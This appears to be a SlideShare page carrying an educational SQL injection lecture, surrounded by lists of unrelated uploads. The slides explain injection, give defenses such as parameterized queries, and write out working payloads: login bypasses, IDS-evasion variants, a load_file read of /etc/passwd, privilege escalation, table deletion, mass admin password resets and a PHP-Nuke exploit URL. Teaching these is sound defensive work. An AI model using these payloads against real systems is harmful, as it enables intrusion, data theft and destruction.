Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1GloryAnnCastre1
 
Expanded definition: technical and operational
Expanded definition: technical and operationalExpanded definition: technical and operational
Expanded definition: technical and operationalssuser3e220a
 

Kürzlich hochgeladen (20)

Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdf
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
Using Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea DevelopmentUsing Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea Development
 
Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...
Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...
Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
 
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptxDIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4
 
MS4 level being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdfMS4 level being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdf
 
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptxINCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
 
Textual Evidence in Reading and Writing of SHS
Textual Evidence in Reading and Writing of SHSTextual Evidence in Reading and Writing of SHS
Textual Evidence in Reading and Writing of SHS
 
prashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Professionprashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Profession
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 Database
 
Scientific Writing :Research Discourse
Scientific Writing :Research DiscourseScientific Writing :Research Discourse
Scientific Writing :Research Discourse
 
Multi Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleMulti Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP Module
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"
 
Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1
 
Expanded definition: technical and operational
Expanded definition: technical and operationalExpanded definition: technical and operational
Expanded definition: technical and operational
 

Sq linjection

  • 1. 1 1 SQL Injection The ability to inject SQL commands into the database engine through an existing application 2 What is SQL? SQL stands for Structured Query Language Allows us to access a database ANSI and ISO standard computer language The most current standard is SQL99 SQL can: execute queries against a database retrieve data from a database insert new records in a database delete records from a database update records in a database
  • 2. 2 3 SQL is a Standard - but... There are many different versions of the SQL language They support the same major keywords in a similar manner (such as SELECT, UPDATE, DELETE, INSERT, WHERE, and others). Most of the SQL database programs also have their own proprietary extensions in addition to the SQL standard! 4 SQL Database Tables A relational database contains one or more tables identified each by a name Tables contain records (rows) with data For example, the following table is called "users" and contains data distributed in rows and columns: dthompsondthompsonThompsonDaniel3 qwertyadamtTaylorAdam2 hellojsmithSmithJohn1 PasswordLoginLastNameNameuserID
  • 3. 3 5 SQL Queries With SQL, we can query a database and have a result set returned Using the previous table, a query like this: SELECT LastName FROM users WHERE UserID = 1; Gives a result set like this: LastName -------------- Smith 6 Data Manipulation Language (DML) SQL includes a syntax to update, insert, and delete records: SELECT - extracts data UPDATE - updates data INSERT INTO - inserts new data DELETE - deletes data
  • 4. 4 7 Data Definition Language (DDL) The Data Definition Language (DDL) part of SQL permits: Database tables to be created or deleted Define indexes (keys) Specify links between tables Impose constraints between database tables Some of the most commonly used DDL statements in SQL are: CREATE TABLE - creates a new database table ALTER TABLE - alters (changes) a database table DROP TABLE - deletes a database table 8 Metadata Almost all SQL databases are based on the RDBM (Relational Database Model) One important fact for SQL Injection Amongst Codd's 12 rules for a Truly Relational Database System: 4. Metadata (data about the database) must be stored in the database just as regular data is Therefore, database structure can also be read and altered with SQL queries
  • 5. 5 9 How common is SQL injection? It is probably the most common Website vulnerability today It is a flaw in "web application" development, it is not a Database or web server problem Most programmers are still not aware of this problem Many tutorials and demo “templates” are vulnerable Even worse, a lot of solutions posted on the Internet are not good enough 10 Vulnerable Applications Almost all SQL databases and programming languages are potentially vulnerable MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc Accessed through applications developed using: Perl and CGI scripts that access databases ASP, JSP, PHP XML, XSL and XSQL Javascript VB, MFC, and other ODBC-based tools and APIs DB specific Web-based applications and API’s Reports and DB Applications 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL) many more
  • 6. 6 11 How does SQL Injection work? Common vulnerable login query SELECT * FROM users WHERE login = 'victor' AND password = '123' (If it returns something then login!) ASP/MS SQL Server login syntax var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'"; 12 Injecting through Strings formusr = ' or 1=1 – – formpwd = anything Final query would look like this: SELECT * FROM users WHERE username = ' ' or 1=1 – – AND password = 'anything'
  • 7. 7 13 The power of ' It closes the string parameter Everything after is considered part of the SQL command Misleading Internet suggestions include: Escape it : replace ' with '' String fields are very common but there are other types of fields: Numeric Dates 14 If it were numeric? SELECT * FROM clients WHERE account = 12345678 AND pin = 1111 PHP/MySQL login syntax $sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
  • 8. 8 15 Injecting Numeric Fields $formacct = 1 or 1=1 # $formpin = 1111 Final query would look like this: SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111 16 Evasion Techniques Input validation circumvention and IDS Evasion techniques are very similar Snort based detection of SQL Injection is partially possible but relies on "signatures" Signatures can be evaded easily Input validation, IDS detection AND strong database and OS hardening must be used together
  • 9. 9 17 IDS Signature Evasion Evading ' OR 1=1 signature ' OR 'unusual' = 'unusual' ' OR 'something' = 'some'+'thing' ' OR 'text' = N'text' ' OR 'something' like 'some%' ' OR 2 > 1 ' OR 'text' > 't' ' OR 'whatever' IN ('whatever') ' OR 2 BETWEEN 1 AND 3 18 SQL Injection Characters ' or " character String Indicators -- or # single-line comment /*…*/ multiple-line comment + addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator ?Param1=foo&Param2=bar URL Parameters PRINT useful as non transactional command @variable local variable @@variable global variable waitfor delay '0:0:10' time delay
  • 10. 10 19 Input validation Some people use PHP addslashes() function to escape characters single quote (') double quote (") backslash () NUL (the NULL byte) This can be easily evaded by using replacements for any of the previous characters in a numeric field 20 Evasion and Circumvention IDS and input validation can be circumvented by encoding Some ways of encoding parameters URL encoding Unicode/UTF-8 Hex enconding char() function
  • 11. 11 21 MySQL Input Validation Circumvention using Char() Inject without quotes (string = "%"): ' or username like char(37); Inject without quotes (string = "root"): ' union select * from users where login = char(114,111,111,116); Load files in unions (string = "/etc/passwd"): ' union select 1, (load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; Check for existing files (string = "n.ext"): ' and 1=( if( (load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); 22 IDS Signature Evasion using white spaces UNION SELECT signature is different to UNION SELECT Tab, carriage return, linefeed or several white spaces may be used Dropping spaces might work even better 'OR'1'='1' (with no spaces) is correctly interpreted by some of the friendlier SQL databases
  • 12. 12 23 IDS Signature Evasion using comments Some IDS are not tricked by white spaces Using comments is the best alternative /* … */ is used in SQL99 to delimit multirow comments UNION/**/SELECT/**/ '/**/OR/**/1/**/=/**/1 This also allows to spread the injection through multiple fields USERNAME: ' or 1/* PASSWORD: */ =1 -- 24 IDS Signature Evasion using string concatenation In MySQL it is possible to separate instructions with comments UNI/**/ON SEL/**/ECT Or you can concatenate text and use a DB specific instruction to execute Oracle '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' MS SQL '; EXEC ('SEL' + 'ECT US' + 'ER')
  • 13. 13 25 SQL injection SQL uses single and double quotes to switch between data and code. Semi-colons separate SQL statements Example query: "UPDATE users SET prefcolor='red' WHERE uid='joe';" This command could be sent from a web front-end to a database engine. The database engine then interprets the command 26 Dynamic SQL Generation Web applications dynamically generate the necessary database commands by manipulating strings Example query generation: $q = "UPDATE users SET prefcolor='$INPUT[color]' WHERE uid='$auth_user'"; where the value of "$INPUT[color]" would be originating from the client web browser, through the web server. and where the value for "$auth_user" would have been stored on the server and verified through some authentication scheme
  • 14. 14 27 Client Web Browser Forms in client browsers return values to the web server through either the POST or GET methods "GET" results in a url with a "?" before the values of the form variables are specified: http://www.example.com/script?color=red The value of "$INPUT[color]" is set to "red" in the script "GET" urls are convenient to hack, but there is no significant difference in the security of either "GET" or "POST" methods because the data comes from the client web browser and is under the control of the remote attacker 28 The SQL Table Tables are used to store information in fields (columns) in relation to a key (e.g., "uid") What other fields could be of interest? CREATE TABLE users ( prefcolor varchar(20), uid VARCHAR(20) NOT NULL, privilege ENUM('normal','administrator'), PRIMARY KEY (uid) );
  • 15. 15 29 A Malicious SQL Query What if we could make the web server generate a query like: "UPDATE users SET prefcolor='red', privilege='administrator' WHERE uid='joe';" Can we engineer the value of "color" given to the web server so it generates this query? Note how code and data are mixed in the same channel Better database interfaces provide separate channels Java prepared statements Stored procedures 30 Malicious HTTP Request http://www.example.com/script?color =red',privilege='administrator The "color" input is then substituted to generate SQL: $q = "UPDATE users SET prefcolor='$INPUT[color]' WHERE uid='$auth_user'"; It gives the query we wanted! Joe now has administrator privileges
  • 16. 16 31 Adding Another SQL Query Suppose that Joe wants to run a completely different query: "DELETE FROM users" This will delete all entries in the table! How can the value of "color" be engineered? 32 Malicious HTTP Request http://www.example.com/script?color=red '%3Bdelete+from+users%3B %3B is the url encoding for ";" What happens when the "color" input is used to generate SQL? $q = "UPDATE users SET prefcolor='$INPUT[color]' WHERE uid='$auth_user'";
  • 17. 17 33 Result UPDATE users SET prefcolor='red'; delete from users; WHERE uid='$auth_user'"; The last line generates an error, but it is already too late; all entries have been deleted. The middle query could have been anything 34 FAQs Couldn't the database have a separate account for "Joe" with only the privileges he needs (e.g., no delete privilege)? YES, but in practice the management of such accounts and privileges, and connecting to the database with the correct IDs, adds significant complexity Most often a database account is created for the entire web application, with appropriate limitations (e.g., without privileges to create and drop tables) A good compromise is to create database accounts for each class of user or class of operation, so: if Joe is a regular user he would not have delete privileges for the user table Changing user preferences, as an operation type, does not require delete privileges
  • 18. 18 35 FAQs Doesn't SSL protect against this sort of attack? No But what if you authenticate users with a username/password over SSL? Then, if the user does SQL injection, the server admins will know who perpetrated the crime, right? Not necessarily; only if you have sufficient audit logging. 36 Another example of SQL Injection UPDATE usertable SET pwd='$INPUT[pwd]' WHERE uid='$INPUT[uid]'; This will modify a password stored in “usertable”
  • 19. 19 37 Malicious http request Coupled to database engine without cleansing: http://www.none.to/script?pwd=ngomo& uid=1'+or+uid+like'%25admin%25';--% This sets the variable pwd to ngomo & is a separator uid is set to “1' or uid like '%admin%';--%” (% are wild cards, like *) What happens when the SQL is interpreted? 38 Resulting SQL query UPDATE usertable SET pwd='ngomo' WHERE uid='1’ or uid like‘%admin%’;--%'; The passwords of all accounts with “admin” in their names have been reset to something only the attacker knows (ngomo)!
  • 20. 20 39 Other SQL Injection Methods Let's say you have blocked single quotes, double quotes and semi- colons. What else can go wrong? How about ""? If an attacker can inject backslashes, then escaped quotes could get ignored by the database 40 PHP-Nuke 5.6 SQL injection CAN-2002-1242 Advisory dated Oct. 31, 2002 Malicious url: modules.php?name=Your_Account&op=saveu ser&uid=2&bio=%5c&EditedMessage= no&pass=xxxxx&vpass=xxxxx&newsletter=, +pass=md5(1)/* Recognize %5c? It’s ‘’
  • 21. 21 41 Query becomes UPDATE nuke_users SET name = '', email = '', femail = '', url = 'http://', pass = 'xxxxx', bio = '', user_avatar = '', user_icq = '', user_msnm = '', newsletter = ', pass=md5(1)/*' WHERE uid='2' Notice how bio would be set to the text in red? Notice how the comment field, ‘/*’, is used to comment out the userid? This means that the query applies to *all* users! 42 Defense: Escape control characters UPDATE nuke_users SET name = '', email = '', femail = '', url = 'http://', pass = 'xxxxx', bio = '', user_avatar = '', user_icq = '', user_msnm = '', newsletter = ', pass=md5(1)/*' WHERE uid='2' In this case, all the attacker manages to do is to set his “newsletter” field to some strange looking string. PHP can do that automatically if configured that way.
  • 22. 22 43 Double whammy: SQL injection and Buffer Overflow Oracle 8i and 9i include six standard Oracle database functions BFILENAME FROM_TZ NUMTODSINTERVAL NUMTOYMINTERVAL TO_TIMESTAMP_TZ TZ_OFFSET with buffer overflow vulnerability that may allow attacker to gain root privileges (since, for example, Oracle runs under administrator account in Windows); in UNIX, only (!) the whole DB is compromised. 44 Double whammy: A legitimate use of the function SELECT FROM_TZ(TIMESTAMP ‘2006-03-22 20:00:00’, ‘7:00’) FROM DUAL returns 22-MAR-06 08:00:00 PM +7:00 What happens with SELECT FROM_TZ(TIMESTAMP ‘2006-03-22 20:00:00’, ‘aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa’) FROM DUAL
  • 23. 23 45 Defending against SQL injections Sanitize all input. Assume all input is harmful. Validate user input that contains dangerous keywords or SQL characters, such as “xp_cmdshell”, “- -”, and “;”. Consider using regular expressions to remove unwanted characters. This approach is safer than writing your own search and replace routines. Run with least privilege. Do not execute an SQL SELECT statement as “sa”. Create low-privilege accounts to access data. Use SQL permissions to lock down databases, stored procedures, and tables. Remove unused stored procedures. 46 Defending against SQL injections Do not allow clients to view ODBC/OLE DB error messages. Handle these errors with your own code. By default, ASP pages returns error messages to clients. Enable logging of all user access, and set alerts to log all failed attempts to access objects. Do not use string concatenations to build SQL queries. Instead, use parameterized queries or parameterized stored procedures, because they explicitly define input and output values and do not process multiple statements as a batch.
  • 24. 24 47 Back to a previous example var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'"; is replaced by SqlConnection objConnection=new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE login = @Name AND password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PasswordTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader(); if (objReader.Read()) { ... Why is it safer? Because the SQL server knows that the value of the parameter is not actual code to execute, but data 48 Links A lot of SQL Injection related papers http://www.nextgenss.com/papers.htm http://www.spidynamics.com/support/whitepapers/ http://www.appsecinc.com/techdocs/whitepapers.html http://www.atstake.com/research/advisories Other resources http://www.owasp.org http://www.sqlsecurity.com http://www.securityfocus.com/infocus/1768